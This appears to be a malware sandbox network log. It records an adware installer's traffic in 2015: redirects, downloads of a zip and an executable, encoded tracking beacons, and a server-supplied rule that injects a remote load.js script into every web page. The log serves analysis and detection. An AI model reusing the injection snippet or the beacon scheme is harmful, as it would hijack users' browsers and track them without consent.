X-Amz-Cf-Id: nKgID5Yc-nIdvrx0eIsp9odtdHN-L9j0CNw7KuZU3PL21uaF8Ka0aw==
    ..//<!-- ../*    Progress bar   */..var g_AmiPbs = new Array();
..var g_AmiPbsEx = new Array();..var g_interval = 0;..var g_initComp =
 0;..var g_possibleComps = [];..var g_reportedComps = [];..var g_remov
edComps = [];....function LogMessage(message) {..    try {..        g_
ami.Log(message);..    }..    catch (excpt) { }..}..function IsDecline
d(name) {..    var declined = 0;..    for (var i = 0; i < g_removed
Comps.length; i  ) {..        if (g_removedComps[i] == name) {..      
      declined = 1;..            break;..        }..    }..    return 
declined;..}..function UpdateSkipStatus(sn) {..    if (g_testa && !Arr
ayContains(g_notest, sn) && !ArrayContains(g_notest1, sn)) {..        
if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {..   
         g_ami.WriteProfileString(g_testf, '', sn, 'S');..        }.. 
   }..}..function ShortNameFromName(name) {..    for (c = 0; c < g_
comps.length; c  ) {..        if (g_comps[c].name == name) {..        
    return g_comps[c].sn;..        }..    }..    return name;..}..func
tion UpdateComponentsStatus() {..    LogMessage('UpdateComponentsStatu
s function started');..    for (var j = 0; j < g_possibleComps.leng
th; j  ) {..        var reported = 0;..        if (g_possibleComps[j].
sn == 'updater') {..            continue;..        }..        for (var
 i = 0; i < g_reportedComps.length; i  ) {..            if (g_repor
tedComps[i].sn == g_possibleComps[j].sn) {..                reported =
 1;..                break;..            }..        }..        if 
<<< skipped >>>


GET /3517/1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 23 Apr 2015 04:23:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Location: hXXp://VVV.tjepgz.cc/files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip
0......


GET /files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 Apr 2015 04:23:40 GMT
Content-Type: application/zip
Content-Length: 2211012
Last-Modified: Tue, 14 Apr 2015 08:23:03 GMT
Connection: keep-alive
ETag: "552cce67-21bcc4"
Accept-Ranges: bytes
PK...........F.v9t............479.json.....qv.B..[.:?..y....xL..@a....
..w..sN.....^.9....'.t.."....u...........N5..g(.......{.)..Q.!..Dk..ze
f....s.{.kM.S.*:.......6|.&...M..ZWYr.....uA....R/..,...0..........g..
]V3..n.`...}..g_j.......i.n..;.........Ts..C......o.l.'7u..........l..
.z.ZJ......S"Z....f....W..m..^....$m.=...O.Z...k.=..i...`_...;......kV
........V..8?V.;...*......EF...^'...?*..n.r&....o..wv..}\S.,......N...
.4.w...6.......:....s..)......C.eg..4..........~........P.F.E.i....0..
....c.....9..feKn.q.x......y...................". /..PK...........F...
......<......uninstallDlg2.xml.[[email protected]..".%
.fW&U......7.(Y...\s.].v.X.4.....3b..._%....r6...m!.".S..Z...gl.Lb...3
2..Hf..^.....)........O..;q-..T.....z6.......s&#.p1.>.........|....
1..Y......%; t..xjI...Q...M.9N2.<;@.~.p....\..A....\..u.....Q%...u.
.e.... ..'9\........\~.. .!I......v....x.t_D.$Bw0.V.......4..8...Es...
.0L..lF..ET..8... p.k-x..qR.....~Kn.gK..'.d....%;...%GK..B.k.[.w....H.
$y.Em.R...:Y.....l.v#..(.d.....ntgA....4.j.{m.W.3V.=.O(.c....P.WT:X.?2
.E.....>..k...=......7b~.]..`.....(.............2_.L......:@...F...
M......1..".9X.....c.!3H%...d...41E2./H...p....R.3........1`.......@..
..W.......2.....e..1n.,.-C..2..)[email protected]...<....r9..../.],!.*..
.M9..cO.h..c..Fr..`......3....<..Q....V.*.~.....5....S...I..nj..Q.A
.. .....bn.2!.9$ .....U%.....p....v.-*.. *C7{...F......4wj..2...2.k...
.tU'63....r.m.~............a.S....W..V ...z..u.~.s...gg...Z\q..'F.8..R
m..V.kT.. E^X)j..QU*>y..\.j.....$...x.=.....kI.-..p.......:....
<<< skipped >>>


GET /8Hk4o HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.nowtake.me
Connection: Keep-Alive


HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.0.15</center>..</body>..</html>..HTTP/
1.1 301 Moved Permanently..Server: nginx/1.0.15..Date: Thu, 23 Apr 201
5 07:24:25 GMT..Content-Type: text/html..Content-Length: 185..Connecti
on: keep-alive..Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requ
ested-With..Access-Control-Allow-Credentials: true..<html>..<
head><title>301 Moved Permanently</title></head>.
.<body bgcolor="white">..<center><h1>301 Moved Perma
nently</h1></center>..<hr><center>nginx/1.0.15
</center>..</body>..</html>....



GET /Bw14Po HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: goo.gl
Connection: Keep-Alive


HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Thu, 23 Apr 2015 07:24:21 GMT
Location: hXXp://VVV.4threquest.me/registro/310113f8.htm
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 191
Server: GSE
Alternate-Protocol: 80:quic,p=1
..........m....0.D.|ES.T..cJ.."&...A.DVkbAK.......lvv2yKsQ...9.S;.^...
..Zt....:s.S.=x...I..P..VEUGx.9a$.Q.u....._.u=!...yT.C...r9....Y..1..!
.4. #5<G....h....{... ./k_..........3..u.}.z.. ....HTTP/1.1 301 Mov
ed Permanently..Content-Type: text/html; charset=UTF-8..Cache-Control:
 no-cache, no-store, max-age=0, must-revalidate..Pragma: no-cache..Exp
ires: Fri, 01 Jan 1990 00:00:00 GMT..Date: Thu, 23 Apr 2015 07:24:21 G
MT..Location: hXXp://VVV.4threquest.me/registro/310113f8.htm..Content-
Encoding: gzip..X-Content-Type-Options: nosniff..X-Frame-Options: SAME
ORIGIN..X-XSS-Protection: 1; mode=block..Content-Length: 191..Server: 
GSE..Alternate-Protocol: 80:quic,p=1............m....0.D.|ES.T..cJ.."&
...A.DVkbAK.......lvv2yKsQ...9.S;.^.....Zt....:s.S.=x...I..P..VEUGx.9a
$.Q.u....._.u=!...yT.C...r9....Y..1..!.4. #5<G....h....{... ./k_...
.......3..u.}.z.. ......



GET /registro/top-line.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: image/gif
Content-Length: 1724
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 23 May 2015 07:24:25 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GIF89a................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...........!.......,............. .........\.0!....B....A...f..qcE. -.
.8..D..-...0...)..d......I.T.R.K..aJ.Z3.O.-w.\*s...MgvD.....E..$..aW.Z
.&M.....O.B..0$J.....K....x.....o_.~...L.0..u..Ulx....#..LY2..y![...q.
.....MZ......^..4...c.V.:5m..]..Mz....E.....l..M..M.6...e.^N..t..QSG^.
....wC.g^......k.~.x........>.............( ....`.......1.........M
(..... .......^X....."...x..(V...... ...Xb.0....0.h_.-....D.i..H&...L6
...PF)..TVi..Xf...\v...`[email protected]&.f....t.Y..o.yg.x.Y.....g...
...v....p.z..|6...w..h..R....*...j:.....)....I*.......r.....F.....*...
......Zk........Kj....(..D ...L[[email protected]...
............n...{....;........'.........:.p....p...|...Z.1..{,.......,
....0....3?Ps. .|3.9..s.;....:.M..H'Ms.H..4.N..5.OS]u.6g]..=.<.
<<< skipped >>>

GET /010914s/verificar_ip.php HTTP/1.1


Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
18............s.......X.......0..HTTP/1.1 200 OK..Server: nginx/1.0.15
..Date: Thu, 23 Apr 2015 07:24:26 GMT..Content-Type: text/html..Transf
er-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.4.30
..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requ
ested-With..X-Cache: BYPASS..CC: UA..Content-Encoding: gzip..18.......
.....s.......X.......0..



GET /services/rules.txt?dummy=534 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:37 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Sun, 28 Dec 2014 17:27:37 GMT
ETag: "5a246f5-10-50b4a12f3b440"
Accept-Ranges: bytes
Content-Length: 16
Cache-Control: max-age=600
Expires: Thu, 23 Apr 2015 07:34:37 GMT
P3P: CP="Potato"
X-Cache: BYPASS
</body>|</body>.HTTP/1.1 200 OK..Server: nginx/1.0.15..Dat
e: Thu, 23 Apr 2015 07:24:37 GMT..Content-Type: text/plain..Connection
: keep-alive..Last-Modified: Sun, 28 Dec 2014 17:27:37 GMT..ETag: "5a2
46f5-10-50b4a12f3b440"..Accept-Ranges: bytes..Content-Length: 16..Cach
e-Control: max-age=600..Expires: Thu, 23 Apr 2015 07:34:37 GMT..P3P: C
P="Potato"..X-Cache: BYPASS..</body>|</body>.....


GET /services/update.php?v=1.0.0&key=DjgSrxXMrVZd5ZDoXibWfcZQfB0nLdzw&dummy=112 HTTP/1.0


Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
inactive..



GET /8Hk4o HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.nowtake.me
Connection: Keep-Alive


HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:53 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.0.15</center>..</body>..</html>..HTTP/
1.1 301 Moved Permanently..Server: nginx/1.0.15..Date: Thu, 23 Apr 201
5 07:24:53 GMT..Content-Type: text/html..Content-Length: 185..Connecti
on: keep-alive..Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requ
ested-With..Access-Control-Allow-Credentials: true..<html>..<
head><title>301 Moved Permanently</title></head>.
.<body bgcolor="white">..<center><h1>301 Moved Perma
nently</h1></center>..<hr><center>nginx/1.0.15
</center>..</body>..</html>....



GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.wpm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 23 Apr 20
15 07:24:48 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.62 ms","message":"store 1 ac
tion and 0 update "}..0......


GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.ient HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:54 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.76 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 23 Apr 20
15 07:24:54 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.76 ms","message":"store 1 ac
tion and 0 update "}..0..



GET /mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA= HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 23 Apr 2015 07:23:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.14
Content-Length: 0
Connection: close
Content-Type: text/html



POST /tdownload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.downloadcrest.com
Content-Length: 106
Connection: Keep-Alive

version=1.1.2.41&s1=57a0c198e2d39f18102a94c10225f3efec999268&t1=1429774025&campid=9664&prefix=amisetup5755
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Content-Disposition: attachment; filename="amisetup5755__9664.exe"
Content-Type: application/x-msdownload
Date: Thu, 23 Apr 2015 07:24:05 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: amisetup5755__9664.exe
Content-Length: 1397248
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A...........
......9......,?.......%.....j.........".......2..............,..`....,
.......,;......,<.....Rich....................PE..L.....8U.........
.................................@.......................... .........
...@..................................................................
....i..0A..............................................t..............
..................textbssG`...............................text........
....................... ..`.rdata.......0......................@[email protected]
ta....n...@...@[email protected]...".......$...............
[email protected]...............................@[email protected]~.............
[email protected].....................................................
......................................................................
......................................................................
.....................................................6S...Zg........w2
.............X..........3....N...TO.........%..................<4..
.Q.....K....b...2..........R...S-...n..... ......../b...?.............
..........................2}...SO...x>.............Y.........N.....
.........`....K>...V~........$....g.....}.............S,.........`.
..T....F.....E....3...p.....q....^.........?...B....D3...l....].......
.......i.........O...."....b...............]..............H........-@.
...L....*....6....c...$&...73...*..........}........f:....p.......
<<< skipped >>>


GET /services/rules?dummy=212 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:15 GMT
Content-Type: text/plain
Content-Length: 265
Connection: keep-alive
Last-Modified: Fri, 06 Feb 2015 21:11:55 GMT
ETag: "5d60ef-109-50e71dec37cc0"
Cache-Control: max-age=600
Expires: Thu, 23 Apr 2015 07:34:15 GMT
P3P: CP="Potato"
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Origin: *
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
Accept-Ranges: bytes
</body>|<script>var cb_instID='{instID}';cbS=document.crea
teElement("script");cbS.setAttribute("type","text/javascript");cbS.set
Attribute("src", "hXXp://related.deals/services/load.js");document.bod
y.appendChild(cbS);</script></body>.{cashReminder_instID}|
{instID}.HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 
07:24:15 GMT..Content-Type: text/plain..Content-Length: 265..Connectio
n: keep-alive..Last-Modified: Fri, 06 Feb 2015 21:11:55 GMT..ETag: "5d
60ef-109-50e71dec37cc0"..Cache-Control: max-age=600..Expires: Thu, 23 
Apr 2015 07:34:15 GMT..P3P: CP="Potato"..Access-Control-Allow-Headers:
 X-Requested-With..Access-Control-Allow-Origin: *..X-Cache: MISS..X-Se
rver: Provided by Intermedia..X-Country: EU..Accept-Ranges: bytes..<
;/body>|<script>var cb_instID='{instID}';cbS=document.createE
lement("script");cbS.setAttribute("type","text/javascript");cbS.setAtt
ribute("src", "hXXp://related.deals/services/load.js");document.body.a
ppendChild(cbS);</script></body>.{cashReminder_instID}|{in
stID}.....
<<< skipped >>>

GET /services/update/1.0.0/iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL/120 HTTP/1.0


Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:16 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Origin: *
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: EU
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:16 
GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-aliv
e..P3P: CP="Potato"..Access-Control-Allow-Headers: X-Requested-With..A
ccess-Control-Allow-Origin: *..X-Cache: BYPASS..X-Server: Provided by 
Intermedia..X-Country: EU..



GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:03 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
57.............V*.I,)V.R..V.Q*..M....,..r......... .....T........<.
....S......T..Z.b.O(H.....0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Da
te: Thu, 23 Apr 2015 07:24:03 GMT..Content-Type: text/html; charset=ut
f-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By:
 PHP/5.3.3..xa-api-version: v4..Content-Encoding: gzip..57............
.V*.I,)V.R..V.Q*..M....,..r......... .....T........<.....S......T..
Z.b.O(H.....0..



GET /mg?alpha=HyZPRnotGAhqT14bYGx1HmIcS3ofYE03fWFKOXdhHXUOIX0+L1I0EmhiTjJaMDJXZwQZUlU2MQZRaxkdDC51SwhncVMJcU8OQzZrVi9y HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:07 GMT
Content-Length: 2004
hHqI6zfbRv25fbMBtZdokyLM4zjRbdf8fOBN3rshiiPI73aYRt2PU5RA75EbynCf/hrAVP
TjZ/sVutNU/EOYmASoOp pdaZ5wKogpyad0HGqCs3vKdQmjsJ0nnj /H7CXZa3IM0UzswF
w23qvDuNfofgDthQ vsg0DyM5GXUe5K6Ha8t2P1vkHrC8nCuJbzWYLg3yuMtxwyFwmSpBo
D/et5ogeEgiEXc2gbEbIbnMIkwzutXllmuuCbcbtPzY8R6ufcK CGe5TvcJoL8JrE6q5c/
1B712QyAY8/XZrZMmKM54WKXpGyVU8rDCNp7 IEGmjPe6wjHHJu2K8E4hvUznT2yuh2vLb
SmbIA0lLAnpCbil2COJtvpL8cru8Zrt0GYo3XHd4jhIIdZys4M GnQtCCNH9XrGN8e7L8k
xD MqzPYbKCsHqgs2P1nhHrdu37qL7bUZoJ0hP4p1yqQi3zgTd67IYsqyO92mEbdj1OUQO
 OAcpwn/4awFT042f7NZruf8V6trUQtjumm1KRZMewNbto4pdzlzrL7xXDIoiFPaxR1vU3
kH6cvWeCQt3JP9dk0bh00jLI4heYHrC2N8spp Zl2GmhmBm/K5HlO4N3wq035GinxmGBOc
zueZgpjMt0pwiY/GPTeJDvOJVEzcgUmnOGtDLKZoS8V5ZIr6kginbLz1riSOb3U6opjq8j
3zT9pyGhJLrQd5g30vkH/g6Y02iQUdTqOZ45kqxulFP2zATTKp6zI4QwkawezEyzujHNKL
/mfcR65uEfrySW6yODedy9N4YrutxzkxXW7zjJbdfBZq5X37U522iAum2TUpqXD9dk17h6
yjnF7xjAHuytN90plKtqk3ag Uvje9bldZxmy/xo6gKF5lLUepz6OtYnz50lkV3J8HXGfp
ajY41F5PE5xGfHmSOFLJ iWcJduqwg5i2E4jOLcbG3HfZqn79xgHXauzaeK6LAYNRs0P83
zmPPwWiwR9/XesZykqhBiVPbxkuMbsWxJY1wn cI0Eu5qyGKdo/mfcJ66PkUoimZsyPfYt
yrN7VmtZdsknSEs2 ObZned6cGgLtT Uiz7y7DRtnZAZQyhpA/iy7S/RTSSIqFEsEijehm
wkOYmASoOp pdbNz3K07pySS6VCYP9D5L8Mjgftbg0rO8FfdfIOocMMamtsI2n3BkzeFOZ
 0FcFQuvVnzTSZ4nLFeqCNELY9n U7i2PCsn7qLKHHZpMY3/4y1Cquz2KhT5ijfdN3l6gu
w1/LyR7ZesD/bI490f0emB6zoSTLOMu9ZcNqoaZdoWqToyPfJ57sfuo t8Vg1GycwhDxGM
 LJbJFzvE5iDmppGGTWcvCD8JU Io/hjjS QjoYJWsN9oph/NH1G23sh60FKaSb4x43aoz
pCaS6VKfJNv5M8M9hoUr4FLb9W7XVYWgZ8MM1tgF2iSGuC6YOd76HtBqt7UwzW7T6WTdc 
j5F7U6maJPhGLHqDeLIqvWbtRs2Os30SrBhW6xQM32adY53qtjjUXdgUvTcMW Ispm
<<< skipped >>>

GET /fp?alpha=UHAKO1kqRR0MZFxoJRFWUTRZNllQLBxKGHdxWy8GFiAEb0pGWwdKP1BGZToMDnt+bFElG2A/bkprKRY8VzgCOSk8BjouWnBZH08abykoWDgPbRFvGER0QkZRIhoKekJQIFMwXQwKCkk3WjsQPBUNbg9vI1cCYToaUXdbZ01DdzVlIlgPD3YdVDEZOBwoJGxSXQJuWXoCF2ULRklwHhhwQUtwUz1YVxwLRCdTOwZsDBxlWX52WRZnOQ0eK1YHFwpwKGJnLhYddAdfc0BhW3UlP0UndhgaOEcSeF1HWCceDnlHQHAVcVFrQBwIcgtmGz99C2ALGiBWGxA4HD1rUmM5VTgHPitMb0kuXghdGD16X3l/VWUORzlZXjw= HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:20 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Pragma: no-cache..
Content-Type: text/plain..Expires: -1..Server: Microsoft-IIS/7.5..X-As
pNet-Version: 4.0.30319..SVR: SP002C2..X-Powered-By: ASP.NET..p3p: CP=
"CAO PSA OUR"..Date: Thu, 23 Apr 2015 07:24:20 GMT..Content-Length: 0.
.....


GET /ii?alpha=U2xSOyMpaRAdPUgWfREsUigBNiNTMF4TLnZUE29sDGkDO3dGUF8tEQB3EC0RXjwOMAgQDGV/NA0TV2o3VjgrJVU5cBEhOwMzQT50KXp9FixQITs5KQYpBhVhM0EHdDhdP3peIQISTzxPJVtTOXR6fEocLiAYIU1jSWh3FTxTSFs4JCszViohFHZJPHYuaTpVJQ9xUnR+RmwHRSUzVgUvTRdiA3RzTlAOEg8EOBpoJH04CAhSVQQ8J2NGagN5MFM4LC0CaDFseHYPVScoKWwobRV0HBcNNCsaLkRbMyYATStmEStRbmBTUl8wFAJsEX4tWT5HCQYNTmN+Il8CY3dVFGZ4bhZ+N095dF4gAms0bDV7CzEbYFF0fltrAUcjNUEFO3kMbls9ZldDCV1HQS1QPWRQOQs/AQQXSWc2EzNAPyVOXHBiEWg6AERhU3QRfW85MmJYJQcuVipyDH9WAS4sAkx4P1crU3wrBhBYTT5bLEc3cXlwJGdVUBoqeT4bZ3U2aRVsOG8KYDAdU1ttTjUoInAxd1hVYh8qG2kRLQohXmJTEiwvM2RMaWNXTEI0OSQ+NmwwW2ojLAYVTyp5OkJ8VjlmWzg4cVg8QyJiPCYQEA== HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:21 GMT
Content-Length: 84
